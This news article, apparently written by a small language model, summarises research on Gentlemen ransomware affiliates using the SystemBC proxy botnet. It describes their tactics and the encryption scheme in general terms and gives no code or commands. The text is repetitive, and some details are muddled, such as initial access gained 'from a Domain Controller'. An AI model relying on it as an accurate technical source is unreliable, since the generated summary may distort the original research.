Ethical Hacking News
In an effort to understand how Gentlemen ransomware affiliates are expanding their attack toolkit and using SystemBC for bot-powered attacks, researchers have found a significant use of proxy malware. The threat actor's integration with SystemBC has led to concerns regarding corporate victimization. This article will provide more insight into the tactics used by the Gentlemen ransomware affiliate in utilizing this tool.
The Gentlemen ransomware uses a botnet called SystemBC to carry out attacks. The Gentlemen ransomware affiliate has expanded its attack toolkit and infrastructure, including the use of proxy malware. The SystemBC botnet is believed to have over 1,570 hosts, many of which are corporate victims. The botnet remains active despite law enforcement efforts in 2024. The Gentlemen ransomware gang uses a hybrid encryption scheme based on X25519 and XChaCha20. The malware terminates databases, backup software, and virtualization processes before encrypting files. The use of SystemBC by the Gentlemen ransomware gang indicates growing operations and increased sophistication. Increased vigilance in endpoint security measures against such threats is crucial.
The ransomware landscape continues to evolve, and one notable example is the Gentlemen ransomware. This particular strain has gained attention for its integration with a botnet known as SystemBC, which has led to increased concerns regarding corporate victimization. In this article, we will delve into the details of how Gentlemen ransomware uses SystemBC for bot-powered attacks.
According to recent findings by Check Point researchers, the Gentlemen ransomware affiliate is expanding their attack toolkit and infrastructure, including an extensive use of proxy malware. The botnet comprised more than 1,570 hosts, believed to be corporate victims, has been discovered as a result of an investigation into a Gentlemen ransomware attack carried out by a gang affiliate.
SystemBC has been around since at least 2019 and is used for SOCKS5 tunneling. Its capability to deliver malicious payloads led to its quick adoption by ransomware gangs. Despite a law enforcement operation that affected it in 2024, the botnet remains active, with Black Lotus Labs reporting daily infections of 1,500 commercial virtual private servers (VPS) last year.
The Gentlemen threat actor operated from a Domain Controller with Domain Admin privileges to gain initial access. They then conducted reconnaissance before deploying Cobalt Strike payloads to remote systems via RPC, leveraging Mimikatz and credential harvesting for lateral movement. The attackers staged the ransomware from an internal server and leveraged built-in propagation and Group Policy (GPO) to trigger near-simultaneous execution of the encryptor across domain-joined systems.
In terms of encryption scheme, Gentlemen ransomware uses a hybrid approach based on X25519 (Diffie–Hellman) and XChaCha20, with an ephemeral key pair generated for each file. The malware terminates databases, backup software, and virtualization processes before encrypting files under 1 MB fully while larger files have only chunks of data encrypted.
The Gentlemen ransomware gang's use of SystemBC in their bot-powered attacks is seen as a sign of their growing operations. This could indicate that the Gentlemen ransomware gang is integrating into broader toolchains and proxy infrastructure, which raises concerns for corporate victimization.
This increasing sophistication highlights the importance of vigilance in terms of endpoint security measures against such threats.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Evolution-of-Gentlemen-Ransomware-A-Look-into-its-Bot-Powered-Attacks-ehn.shtml
https://www.bleepingcomputer.com/news/security/the-gentlemen-ransomware-now-uses-systembc-for-bot-powered-attacks/
https://thehackernews.com/2025/09/systembc-powers-rem-proxy-with-1500.html
https://cybersecuritynews.com/systembc-botnet-hacking-1500-vps-servers/
Published: Mon Apr 20 16:14:47 2026 by llama3.2 3B Q4_K_M
